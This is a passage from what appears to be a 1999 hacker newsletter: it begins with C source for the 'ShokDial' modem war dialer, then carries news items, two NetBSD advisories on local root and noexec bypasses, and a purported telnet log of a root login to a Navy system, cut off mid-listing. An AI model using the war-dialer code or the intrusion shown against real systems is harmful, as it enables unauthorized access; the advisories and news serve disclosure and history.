connect++; fprintf(logfile, "*** CONNECT *** to 1-%.3d-%.3d-%.4d\n", First3Digits, Last3Digits, ScanMin); fflush(logfile); printf("%s*** %sCONNECT %s%s*** %sto %s1-%.3d-%.3d-%.4d%s\n", BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL, PINK, First3Digits, Last3Digits, ScanMin, NORMAL); /* Send a string to the carrier and check for response */ if (send && listen) { /* send poke string and listen for reply */ if (write(fd, sendstring, sizeof(sendstring)) == ERROR) { perror("write"); close(fd); fclose(logfile); exit(ERROR); } response = 1; /* The sighandler sets this to 1 if it */ /* times out */ printf("response from carrier (after sending string): "); fprintf(logfile, "response from carrier (after sending string): "); fflush(stdout), fflush(logfile); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } else { /* listen = 1, send = 0 */ response = 1; /* The sighandler sets this to 1 if it */ /* times out. */ printf("response from carrier: "); fprintf(logfile, "response from carrier: "); fflush(stdout), fflush(logfile); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } } memset(buf, 0, sizeof(buf)); hangup(); if (rand != 1) { /* Increase ScanMin so it scans for the next number */ ScanMin++; if (ScanMin > ScanMax) { /* If they are different...then they are scanning */ /* something like: 555-XXXX through 556-XXXX. */ /* So now we reset everything. */ /* * If you did: 555-755-XXXX through * 555-757-XXXX, we need to increase * the 755 and repeat until they are the * same. */ if ((First3Digits != First3Digits1) || (Last3Digits != Last3Digits1)) { if (First3Digits != First3Digits1) First3Digits++; if (Last3Digits != Last3Digits1) Last3Digits++; ScanMin = ScanMin1; /* Restore to its original value */ continue; } memset(buf, 0, sizeof(buf)); #ifdef BEEP putchar('\a'); #endif fprintf(logfile, "\nFinished scanning 1-%.3d-%.3d-%.4d through 1-%.3d-%.3d-%.4d.\n", First3Digits, Last3Digits, ScanMin1, First3Digits, Last3Digits, ScanMax); memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); fprintf(logfile, "Finished at/on: %s", date); fflush(logfile); printf("Finished scanning %s1-%.3d-%.3d-%.4d%s through %s1-%.3d-%.3d-%.4d%s", BOLDCYAN, First3Digits, Last3Digits, ScanMin1, NORMAL, BOLDCYAN, First3Digits, Last3Digits, ScanMax, NORMAL); /* Print statistics. */ printf("%sResults%s:\n", BOLDRED, NORMAL); printf("\t# of %ssuccessful connects%s: %s%d%s\n", BOLDCYAN, NORMAL, PINK, connect, NORMAL); printf("\t# of %sbusy (timed out)%s: %s%d%s\n", YELLOW, NORMAL, PINK, busy, NORMAL); printf("\t# of %sno responses (timed out)%s: %s%d%s\n", BOLDGREEN, NORMAL, PINK, noresponse, NORMAL); printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s\n", BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL); break; } } memset(phonenum, 0, sizeof(phonenum)); } } fclose(logfile); } /* --------------------------------------- */ void confdial(char *confile) { time_t tm; /* Where we our calendar time is stored */ FILE *logfile; /* For the log file */ FILE *confd; /* For the config file */ char date[32]; /* Contain time scanning started/stopped */ char pnum1[20]; /* Phone # without the '-'s and what not. */ char phonenum[20]; /* This will include the ATDT etc. */ if ((logfile = fopen(LogFile, "a")) == NULL) { perror("fopen"); exit(ERROR); } fprintf(logfile, "\n----------------------\n\n"); fflush(logfile); if ((confd = fopen(confile, "r")) == NULL) { perror("fopen"); exit(ERROR); } memset(buf, 0, sizeof(buf)); memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); printf("Reading phone numbers from \"%s%s%s\".\n", PINK, confile, NORMAL); printf("\nNOTE: There is no checking of the phone number for -c or -s\n" "to allow you to enter odd strings such as \"5551234,,,5#\".\n\n"); fprintf(logfile, "Started at/on: %s\n" "Reading phone numbers from config file \"%s\".\n", date, confile); fflush(logfile); memset(date, 0, sizeof(date)); if (daemon == 1) putchar('\n'); /* Just to make it look nicer */ printf("Using a %s%d%s second connection %stimeout%s.\n", BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL); memset(pnum1, 0, sizeof(pnum1)); memset(phonenum, 0, sizeof(phonenum)); while (!feof(confd)) { if ((fgets(pnum, 512, confd)) == NULL) { perror("fgets"); exit(ERROR); } if (pnum[0] == '\n') continue; if ((strstr(pnum, "#")) != NULL) { if (pnum[0] == '#') continue; else { /* Well either there are some spaces, or a */ /* number before the comment */ char *p, *p1; char temp[20]; memset(temp, 0, sizeof(temp)); p = pnum, p1 = temp; while(*p == '\t' || *p == ' ') *p += 1; if (*p == '#') /* Just some space and a comment */ continue; else { /* Okay it's a number */ while(*p != '\t' || *p != ' ' || \ *p != '\n' || *p != '\0' || *p != '#') *p1++ = *p++; sprintf(pnum, "%s", temp); } } } fprintf(logfile, "Dialing %s\n", pnum); fflush(logfile); strip(pnum, pnum1); printf("Dialing %s%s%s\n", BOLDCYAN, pnum, NORMAL); sprintf(phonenum, "ATDT%s\r", pnum1); numbytes = write(fd, phonenum, strlen(phonenum)); check_for_error(LogFile, fd, numbytes, "write"); memset(buf, 0, sizeof(buf)); alarm(TIMEOUT); /* How long to wait for timeout */ sig = 0; connected = 1; /* * Easier to set it to 1 and then set it * to 0 if it's not than vice versa */ do { numbytes = read(fd, buf, 511); if (sig == 1) break; } while ((strstr(buf, "CONNECT")) == NULL); alarm(0); /* Stop the timing. */ /* Compare the string with "CONNECT" */ if (connected == 1) { #ifdef BEEP putchar('\a'); #endif fprintf(logfile, "*** CONNECT *** to %s", pnum); printf("%s*** %sCONNECT %s%s*** %s to %s%s%s\n", BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL, PINK, pnum, NORMAL); /* Send a string to the carrier and check for response */ if (send && listen) { /* send poke string and listen for reply */ if (write(fd, sendstring, sizeof(sendstring)) == ERROR) { perror("write"); close(fd); exit(ERROR); } response = 1; /* Sighandler will set this to 0 if it times out */ printf("response from carrier (after sending string): "); fprintf(logfile, "response from carrier (after sending string): "); fflush(stdout), fflush(logfile); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } else { /* listen = 1, send = 0 */ response = 1; /* The sighandler will set this to 0 if it */ /* times out */ printf("response from carrier: "); fprintf(logfile, "response from carrier: "); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } } memset(buf, 0, sizeof(buf)); hangup(); } #ifdef BEEP putchar('\a'); #endif memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); fprintf(logfile, "Finished dialing at/on: %s", date); fflush(logfile); printf("Finished dialing!!\n"); printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n", BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL); fclose(logfile); return; } /* -------------------------------------- */ void inputdial() { time_t tm; /* Where we our calendar time is stored */ FILE *logfile; /* For the log file */ char date[32]; /* Contain time scanning started/stopped */ char phonenum[20]; /* This will include the ATDT etc. */ /* Get location of numbers: local numbers or long distance numbers */ LorD: printf("Scanning..\n(%sL%s)ocal, Long (%sD%s)istance: ", PINK, NORMAL, PINK, NORMAL); while(1) { LocalOrLong = getchar(); if (!isprint(LocalOrLong)) continue; if ((toupper(LocalOrLong) != 'L') && (toupper(LocalOrLong) != 'D')) { printf("%sInvalid%s option '%s%c%s'. Enter '%sL%s' or '%sD%s'.\n\n", BOLDRED, NORMAL, BOLDCYAN, LocalOrLong, NORMAL, YELLOW, NORMAL, YELLOW, NORMAL); goto LorD; /* Reprint message. */ } else break; } if ((logfile = fopen(LogFile, "a")) == NULL) { perror("fopen"); exit(ERROR); } fprintf(logfile, "\n----------------------\n\n"); fflush(logfile); memset(buf, 0, sizeof(buf)); memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); fprintf(logfile, "Started at/on: %s\n", date); fprintf(logfile, "Reading phone numbers stdin.\n"); fflush(logfile); memset(date, 0, sizeof(date)); if (daemon == 1) putchar('\n'); /* Just to make it look nicer */ printf("Using a %s%d%s second connection %stimeout%s.\n", BOLDCYAN, TIMEOUT, NORMAL, BOLDWHITE, NORMAL); memset(phonenum, 0, sizeof(phonenum)); printf("When finished, enter \"%s.%s\" as the number.\n", BOLDWHITE, NORMAL); printf("\nNOTE: There is no checking of the phone number for -c or -s\n" "to allow you to enter odd strings such as \"5551234,,,5#\".\n\n"); signal(SIGINT, sighandler); signal(SIGTERM, sighandler); while (1) { if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */ printf("Enter phone number (i.e. 555-5555): "); scanf("%3d%*c%4d", &First3Digits, &ScanMin); /* First3Digits and ScanMin will both be 0 if "." is entered */ if (First3Digits == 0 && ScanMin == 0) goto finished; sprintf(pnum, "%.3d%.4d", First3Digits, ScanMin); fprintf(logfile, "Dialing %.3d-%.4d\n", First3Digits, ScanMin); fflush(logfile); } else { /* LocalOrLong == 'D', use long distance phone numbers */ printf("Enter phone number (i.e. 555-555-5555): "); scanf("%3d%*c%3d%*c%4d", &First3Digits, &Last3Digits, &ScanMin); /* First3Digits and ScanMin will both be 0 if "." is entered */ if (First3Digits == 0 && ScanMin == 0 && Last3Digits == 0) goto finished; sprintf(pnum, "1%.3d%.3d%.4d", First3Digits, Last3Digits, ScanMin); fprintf(logfile, "Dialing %.3d-%.3d-%.4d\n", First3Digits, Last3Digits, ScanMin); fflush(logfile); } sprintf(phonenum, "ATDT%s\r", pnum); numbytes = write(fd, phonenum, strlen(phonenum)); check_for_error(LogFile, fd, numbytes, "write"); memset(buf, 0, sizeof(buf)); alarm(TIMEOUT); /* How long to wait for timeout */ sig = 0; connected = 1; /* * Easier to set it to 1 and then set it * to 0 if it's not than vice versa */ do { numbytes = read(fd, buf, 511); if (sig == 1) break; } while ((strstr(buf, "CONNECT")) == NULL); alarm(0); /* Stop the timing. */ /* Compare the string with "CONNECT" */ if (connected == 1) { #ifdef BEEP putchar('\a'); #endif fprintf(logfile, "*** CONNECT *** to %s", pnum); printf("%s*** %sCONNECT %s%s*** %s to %s%s%s\n", BOLDWHITE, BOLDCYAN, NORMAL, BOLDWHITE, NORMAL, PINK, pnum, NORMAL); if (send && listen) { /* send poke string and listen for reply */ if (write(fd, sendstring, sizeof(sendstring)) == ERROR) { perror("write"); close(fd); exit(ERROR); } response = 1; /* The sighandler returns 0 when it times out */ printf("response from carrier (after sending string): "); fprintf(logfile, "response from carrier (after sending string): "); fflush(stdout), fflush(logfile); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } else { /* listen = 1, send = 0 */ response = 1; /* The sighandler will set this to 0 if it */ /* times out */ printf("response from carrier: "); fprintf(logfile, "response from carrier: "); fflush(stdout), fflush(logfile); if (read(fd, buf, sizeof(buf)) == ERROR) { perror("read"); printf("continuing anyway...\n"); } if (response == 1) { printf("%s\n", buf); fprintf(logfile, "%s\n", buf); } else { printf("timed out while waiting for response\n"); fprintf(logfile, "timed out while waiting for response\n"); } } } memset(buf, 0, sizeof(buf)); hangup(); } finished: memset(date, 0, sizeof(date)); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); fprintf(logfile, "User ended dialing at/on: %s", date); fflush(logfile); printf("Okay I hope you enjoyed it!\n"); printf("Thanks for using %sS%sh%so%sk%sD%si%sa%sl %s%s%s.\n", BLINKCYAN, BOLDGREEN, BOLDBLUE, BOLDPINK, YELLOW, BOLDWHITE, BOLDRED, PINK, BOLDBLUE, VERSION, NORMAL); fclose(logfile); return; } /* -------------------------------------- */ void hangup() { FILE *logfile; if ((logfile = fopen(LogFile, "a")) == NULL) { perror("fopen"); exit(ERROR); } /* * The reason we write "ATH" to a nonconnected host is that * this is fine. But when it's connected... +++ is sent as * the login name, and ATH as the password (not a good thing * to be logged on a remote host anyway. ;) * If it is connected we will take the less effecient method * of closing and reopening the fd to hang up */ if (connected != 1) { numbytes = write(fd, "+++\r", 4); check_for_error(LogFile, fd, numbytes, "write"); usleep(500000); memset(buf, 0, sizeof(buf)); numbytes = write(fd, "ATH0\r", 5); check_for_error(LogFile, fd, numbytes, "write"); /* * We're using SIGALRM, and sleep() uses sig alarm * and usleep() doesn't. */ usleep(1000000); numbytes = read(fd, buf, sizeof(buf)); check_for_error(LogFile, fd, numbytes, "read"); usleep(2000000); if (noOK != 1) noOK = checkok(LogFile, fd, buf, "hanging up modem"); else { /* There was an error getting an "OK" from the modem */ fclose(logfile); close(fd), exit(ERROR); } if (noOK == 1) { /* There was an error getting an "OK" from the modem */ fclose(logfile); close(fd), exit(ERROR); } } else { if (close(fd) == ERROR) { perror("close"); exit(ERROR); } open_port(); connected = 0; } memset(buf, 0, sizeof(buf)); fclose(logfile); } /* -------------------------------------- */ /* The reason I have two different sighandler functions, rather than */ /* just basing off the signal number, is simplicity. */ void sighandler(int signum) { FILE *logfile; char date[32]; /* Where the date for the ending time is stored. */ time_t tm; /* Where calendar time is stored. */ memset(date, 0, sizeof(date)); /* Just exit on one of these signals. */ signal(SIGINT, stopnow); signal(SIGTERM, stopnow); tm = time(NULL); sprintf(date, "%s", ctime(&tm)); if ((logfile = fopen(LogFile, "a")) == NULL) { perror("fopen"); exit(ERROR); } printf("%sReceived signal to quit%s:\nClosing up modem, logging, and exitting.\n", BOLDRED, NORMAL); fprintf(logfile, "\nReceived signal to quit. Aborting.\n"); fflush(logfile); if (conf == 1) { fprintf(logfile, "Last number dialed was %s", pnum); close(fd); fclose(logfile); exit(ERROR); } if (toupper(LocalOrLong) == 'L') { /* Use local phone numbers */ if (rand != 1 || conf != 1) { fprintf(logfile, "Last number dialed was %.3d-%.4d.\n", First3Digits, ScanMin); printf("Last number dialed was %s%.3d-%.4d%s.\n", BOLDCYAN, First3Digits, ScanMin, NORMAL); } fprintf(logfile, "Results:\n"); fprintf(logfile, "\t# of successful connects: %d\n", connect); fprintf(logfile, "\t# of busy numbers: %d\n", busy); fprintf(logfile, "\t# of no responses (timed out): %d\n", noresponse); } else { /* if LocalOrLong == 'D' */ if (rand != 1 || conf != 1) { fprintf(logfile, "Last number dialed was 1-%.3d-%.3d-%.4d.\n", First3Digits, Last3Digits, ScanMin); printf("Last number dialed was %s1-%.3d-%.3d-%.4d%s.\n", BOLDCYAN, First3Digits, Last3Digits, ScanMin, NORMAL); } fprintf(logfile, "Results:\n"); fprintf(logfile, "\t# of successful connects: %d\n", connect); fprintf(logfile, "\t# of busy numbers: %d\n", busy); fprintf(logfile, "\t# of no responses (timed out): %d\n", noresponse); } /* Print statistics. */ printf("%sResults%s:\n", BOLDRED, NORMAL); printf("\t# of %ssuccessful connects%s: %s%d%s\n", BOLDCYAN, NORMAL, PINK, connect, NORMAL); printf("\t# of %sno responses (timed out)%s: %s%d%s\n", YELLOW, NORMAL, PINK, busy, NORMAL); printf("\t# of %sno responses (timed out)%s: %s%d%s\n", BOLDGREEN, NORMAL, PINK, noresponse, NORMAL); fprintf(logfile, "Aborted at: %s", date); fflush(logfile); noshow = 1; /* So we don't get 'Opening modem for dialing' because */ /* we use open_port() for both hanging up and dialing. */ hangup(); close(fd); fclose(logfile); exit(0); } /* -------------------------------------- */ void sighandler1(int signum) { signal(SIGALRM, sighandler1); sig = 1; response = 0; connected = 0; } /* -------------------------------------- */ void menu(int signum) { char ch; signal(SIGINT, sighandler); signal(SIGTERM, sighandler); printf("\n\n1. Hang up modem and skip to next number\n"); printf("2. Hang up modem and exit\n\n"); printf("Enter 1 or 2: "); while (1) { fflush(stdout); ch = getchar(); if (ch == '1') { alarm(0); /* Stop the timeout timer. */ /* Just act like the number timed out. sighandler1 is */ /* the sig handler called when a number times out. */ sighandler1(0); /* Reset signal handlers. */ signal(SIGINT, menu); signal(SIGTERM, menu); break; } else if (ch == '2') { /* Sig handler used to exit. So we will just call this. */ sighandler(0); } else if (isprint(ch)) printf("Invalid option.\nEnter 1 or 2: "); } } void stopnow(int signum) { /* Exit immediately. */ exit(ERROR); } 20.0 Australia gears up security for olympics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Australia Proposes Intelligence Service Hacking Powers CANBERRA, AUSTRALIA, 1999 MAR 25 (Newsbytes) -- By Adam Creed, Newsbytes. Australia's internal security service ASIO (Australian security intelligence organization) is set to get increased powers to hack into computers, copy files and alter software on computers in Australia as it conducts the country's largest ever intelligence operation in the run up to the Sydney 2000 Olympics. Federal Attorney-General Daryl Williams Thursday introduced into the House of Representatives the first amendments to the ASIO Act in 20 years. The amendments, if passed by Parliament would give the intelligence-gathering service the freedom to access information on the computers and networks of Australian companies and individuals. Williams claimed the amendments were not n response to the security challenges posed by one event, the Olympics, but through a need to have free access to new sources of intelligence in the information age. The ASIO Legislation Amendment Bill 1999 will permit security officers to hack into a computer if "there are reasonable grounds for believing that access to data held in a particular computer (the target computer) will substantially assist the collection of intelligence that is important in relation to security. An access warrant permits ASIO to use computers, phone companies and telecommunications equipment to to gain access to a remote or networked computer. Once in, the ASIO hackers will be allowed to copy, add, delete or alter any data in the target computer that is relevant to the security matter. When they leave security officers will be allowed to cover up the fact that they hacked into the system and will not be subject to the Crimes Act which forbids computer hacking in Australia. Although Williams asserts the expanded powers are not in preparation for the 2000 Olympics solely, the role of ASIO during the Olympics has been discussed for over a year. A 1998 Australian National Audit Office (ANAO) report assessing the adequacy of planned responsibilities and preparations for security during the Olympic games speaks of the new challenges faced by ASIO as it draws on new sources of information both domestically and overseas. "The Olympics represent a task well beyond the normal scope of intelligence activities, particularly as it will extend to areas outside the usual focus for Australia's security interests," read the report, describing how organizational structures for Olympic intelligence operations closely mirrored the arrangements for "coordinating threat assessments and activities related to terrorism." During the Olympics ASIO will be expected to collect and disseminate intelligence information. Interestingly, at the time of the report, the use of the Internet for intelligence-gathering and monitoring in conjunction with intelligence from overseas allies (the US and UK) was also discussed. "Access to open source material, e,g, Internet and media, may also be used to supplement other material," said the report, talking about online monitoring, search engine use and filters. It went on to note problems with this approach caused by the huge amount of resources needed and the potential for disinformation. The Australian Security Intelligence Organisation Legislation Amendment Bill 1999 can be found on the World Wide Web at http://www.aph.gov.au/parlinfo/billsnet/bills.htm , and the ANAO audit of Olympic security preparations is in PDF format at http://www.anao.gov.au/rptsfull_99/audrpt5/rpt5-99.pdf . Reported By Newsbytes News Network, http://www.newsbytes.com @HWA 21.0 NetBSD security advisories: umapfs and noexec mount flag ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ NetBSD Security Advisory 1999-006 ================================= Topic: Security hole in umapfs Version: NetBSD 1.3.3 and prior; NetBSD-current until 19990312 Severity: Local users can gain root privileges Abstract ======== Insufficient kernel checking in the umapfs virtual file system allows local users to remap their user id to any other user including the root user. umapfs is enabled in the default (GENERIC) kernel for the following ports: amiga, arm32, atari, bebox, i386, mac68k, macppc, newsmips, next68k, next68k, ofppc, pmax, sparc, sparc64, vax, x68k. The alpha, hp300, mvme68k, pc532 and sun3 ports do not include umapfs by default. Technical Details ================= umapfs creates a null layer, duplicating a sub-tree of the file system name space under another part of the global file system, with uid/gid remapping. The uid and gid mappings are described in two files supplied by the user to mount_umap(8). When a umapfs mount is attempted, no additional checks are done in the kernel other than the usual checks: the user must be root, or have read access of the target and be owner of the mount point. The only permission checks made were erroneously placed in the mount_umap(8) command. A malicious user can compile their own mount_umap binary that does not include these checks. With this modified mount_umap a user can mount any directory on another directory they have write access to with their uid mapped to 0. They will then have be able to create and modify root owned files in the source directory, including the ability to create setuid root binaries. Solution and Workarounds ========================= A patch is available for the NetBSD 1.3.3 which restricts umapfs mounts to root and fixes the above problem. You may find this patch on the NetBSD ftp server: ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990311-umapfs NetBSD-current since 19990312 is not vulnerable. Users of NetBSD-current should upgrade to a source tree later than 19990312. If neither of the above can be performed, a simple work around is to remove umapfs from your kernel configuration and rebuild a kernel. For this you need to remove or comment out the line: file-system UMAPFS # NULLFS + uid and gid remapping in the configuration file. See these URL's for documentation building a NetBSD kernel: http://www.NetBSD.ORG/Documentation/kernel/index.html#downloading_kernel_source http://www.NetBSD.ORG/Documentation/kernel/index.html#building_a_kernel Thanks To ========= Thanks go to Manuel Bouyer for the discovery and solution for this problem. Revision History ================ 1999/03/17 - initial version More Information ================ Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/. Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved. $NetBSD: NetBSD-SA1999-006.txt,v 1.5 1999/03/17 12:15:13 mrg Exp $ @HWA 21.1 NetBSD noexec mount flag advisory ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -----BEGIN PGP SIGNED MESSAGE----- NetBSD Security Advisory 1999-007 ================================= Topic: noexec mount flag is not properly handled by non-root mount Version: NetBSD 1.3.3 and prior; NetBSD-current until 19990318 Severity: Local users can execute binaries they're not allowed to Abstract ======== On a system where all partitions writable by regular users are mounted with the `noexec' option, a regular user should not be able to execute a binary which was not put on the system by the administrator. Insufficient checks in the mount system call may allow a regular user to mount a device, remote host or local directory without the `noexec' option, allowing them to execute arbitrary binaries. Technical Details ================= The mount syscall does not require root privileges, it only requires that the user has read access to the target and is owner of the mount point. For such mounts, the `nosuid' and `nodev' flags, which disable set-id executables and device special files respectively, are automatically handled by the mount system call, but not the `noexec' flag, which disables the ability to execute binaries on this partition. This allows a regular user to perform a mount on a mount point he owns, and then execute binaries from this mount point, even if the mount point was initially in a sub-tree of the global filesystem mounted with the `noexec' option. The easiest way to bypass a `noexec' restriction is to use a nullfs mount, but a NFS mount, or a mount from a readable block device can allow it as well. Solutions and Workarounds ========================= A patch is available for the NetBSD 1.3.3 which makes the mount system call inherit the `noexec' flag from the mount point. You may find this patch on the NetBSD ftp server: ftp://ftp.NetBSD.ORG/pub/NetBSD/misc/security/patches/19990317-mount NetBSD-current since 19990318 is not vulnerable. Users of NetBSD-current should upgrade to a source tree later than 19990318. Thanks To ========= Manuel Bouyer for the solution. Revision History ================ 1999/03/17 - initial version More Information ================ Information about NetBSD and NetBSD security can be found at http://www.NetBSD.ORG/ and http://www.NetBSD.ORG/Security/. Copyright 1999, The NetBSD Foundation, Inc. All Rights Reserved. $NetBSD: NetBSD-SA1999-007.txt,v 1.1 1999/03/18 07:35:55 mrg Exp $ -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBNvCxMz5Ru2/4N2IFAQFWkAQAlHWahlMRPWuribmek9zc/incJeGi8OWj TxxZY2OPMPluEkmOT30xsGtpNZWKaDUv8g1q6X3KBnYsZFonS5RW/AhClSha5nCL Kx4GiG/9KNK07a06F0G+WjxOrAXSSvh0UyxLbn6E7VJa7/g8h2Uk3osG5SNMkuvj qTfmCofhnKI= =TH30 -----END PGP SIGNATURE----- @HWA 22.0 Checkpoint releases new DHCP based user 'mapping' technology to track users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From the ISN list Forwarded From: Will Spencer Check Point Launches Address Mapping Technology Check Point Software Technologies Ltd. introduced mapping technology yesterday that automatically matches an end user's identity to a dynamically assigned IP address. Check Point says its User to Address Mapping technology will help IT managers track network use and enforce access policies in Dynamic Host Control Protocol, where IP addresses change often. A byproduct of Check Point's 1998 merger with MetaInfo, the technology is available as part of Check Point's Meta IP software for IP address management. User to Address Mapping is also integrated with Check Point's Firewall 1 and VPN 1 products. When IT managers use this technology in conjunction with their firewalls, they can control access: assign granular network privileges, track excessive Internet usage, and trace unauthorized IP addresses that cause conflicts that interrupt network service. User to Address Mapping transparently maps four components -- a user's logon name, logon time, IP address, and Media Access Control address -- to a dynamically assigned IP address. An Enterprise Edition of the Meta IP 4.1 product starts at $9,995 for a 1,000-node network. A version for smaller networks starts at $445 for a 100-node license. -- Amy K. Larsen -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 23.0 SPAWAR a Navy Infosec site ... go FISH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Web Site: US DEPARTMENT OF DEFENSE WARNING STATEMENT This is a Department of Defense computer system. This computer system, including all related equipment, networks and network devices (specifically including Internet access), are provided only for authorized U. S. Government use. DoD computer systems may be monitored for all lawful purposes, including to ensure that their use is authorized, for management of the system, to facilitate protection against unauthorized access, and to verify security procedures, survivability and operational security. Monitoring includes active attacks by authorized DoD entities to test or verify the security of this system. During monitoring, information may be examined, recorded, copied and used for authorized purposes. All information, including personal information, placed on or sent over this system may be monitored. Use of this DoD computer system, authorized or unauthorized, constitutes consent to monitoring of this system. Unauthorized use may subject you to criminal prosecution. Evidence of unauthorized use collected during monitoring may be used for administrative, criminal or adverse action. Use of this system constitutes consent to monitoring for these purposes. PRIVACY AND SECURITY NOTICE This Navy Web Information Service is provided as an official service by the Space and Naval Warfare Systems Command. For site security and management purposes, all transactions with this server are collected for security and statistical purposes. This government computer system uses software programs to create summary statistics, which are used for determining technical design specifications, traffic load, and to identify system performance or problem areas. For site security purposes and to ensure that this service remains available to all users, this government computer system employs software programs to monitor network traffic to identify unauthorized attempts to upload or change information, or otherwise cause damage. Except for authorized law enforcement investigations, no other attempts are made to identify individual users or their usage habits. Raw data logs are used for no other purposes and are scheduled for regular destruction in accordance with National Archives and Records Administration General Schedule 20. Unauthorized attempts to upload information or change information on this service are strictly prohibited and may be punishable under the Computer Fraud and Abuse Act of 1986 and the National Information Infrastructure Protection Act. If you have any questions or comments about the information presented here, please forward them to the Internet Operations Manager or 1.800.304.4636. DISCLAIMER Areas of this Server link to other Web Information Systems providing security-related information which are operated by other government organizations, commercial firms, educational institutions, and private parties. We have no control over the Information on those systems which may be objectionable or which may not otherwise conform to Department of Navy policies. Unless otherwise noted, some of the Sites listed within the pages of this server are provided by organizations outside the Navy Domain. These links are offered as a convenience and for informational purposes only. Their inclusion here does not constitute an endorsement or an approval by the Department of the Navy of any of the products, services, or opinions of the external providers. The Department of the Navy bears no responsibility for the accuracy or the content of external sites. Telnet: (real system, simulated intrusion) $telnet x.x.x.x Trying x.x.x.x... Connected to x.x.x. Escape character is '^]'. UNIX(r) System V Release 4.0 (droid) ---------------------------------------------------------------------------- | USE OF THIS OR ANY OTHER DEPT. OF DEFENSE INTEREST COMPUTER SYSTEM | | (DODICS) CONSTITUTES AN EXPRESS CONSENT TO MONITORING AT ALL TIMES. | | This DODICS and all related equipment are to be used for the communication,| | transmission, processing, and storage of official U.S. Government or other | | authorized information only. All DODICS are subject to monitoring at all | | times. If monitoring of any DODICS reveals possible violation of criminal | | statutes, all relevant information may be provided to law enforcement | | officials. | ---------------------------------------------------------------------------- login: root Password: login incorrect login: root Password: Last login: Wed Mar 31 15:50:07 from hactivism.net Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994 The Regents of the University of California. All rights reserved. (droid) #1: Thu Dec 24 17:14:45 EST 1998 Updated with: ISS 2.03 October 1998 BEWARE. stty: No match. % ps -aux USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND sas 549 95.5 1.3 1156 836 p0- R Thu04PM 8644:39.03 /usr/local/bin/ sas 13683 2.4 0.5 468 336 p0 Ss 8:15PM 0:00.59 -csh (csh) root 13682 1.2 1.0 844 596 ?? Ss 8:15PM 0:00.35 telnetd root 3 0.0 0.0 0 0 ?? DL Thu09AM 0:00.00 (vmdaemon) root 4 0.0 0.0 0 0 ?? DL Thu09AM 13:06.06 (syncer) root 29 0.0 0.2 204 88 ?? Is Thu09AM 0:00.01 adjkerntz -i root 89 0.0 0.8 788 496 ?? Ss Thu02PM 0:41.67 syslogd daemon 101 0.0 0.7 760 464 ?? Is Thu02PM 0:00.33 portmap root 125 0.0 0.8 820 500 ?? Ss Thu02PM 0:20.93 inetd root 128 0.0 0.8 936 492 ?? Ss Thu02PM 0:43.73 cron root 178 0.0 1.2 1156 768 ?? Ss Thu02PM 0:08.37 sendmail: accep root 315 0.0 1.7 1276 1044 v0 Is+ Thu02PM 0:07.11 -tcsh (tcsh) root 317 0.0 0.8 780 476 v2 Is+ Thu02PM 0:00.14 /usr/libexec/ge root 318 0.0 0.8 780 476 v3 Is+ Thu02PM 0:00.13 /usr/libexec/ge root 319 0.0 0.7 776 420 ?? I Thu02PM 0:00.11 /usr/libexec/ge root 320 0.0 0.7 776 420 ?? I Thu02PM 0:00.11 /usr/libexec/ge root 371 0.0 1.2 1036 744 ?? Is Thu02PM 0:55.74 SCREEN (screen- root 1959 0.0 1.6 1400 972 ?? Ss Fri10AM 3:13.06 httpd root 1965 0.0 1.3 1072 824 ?? Ss Fri10AM 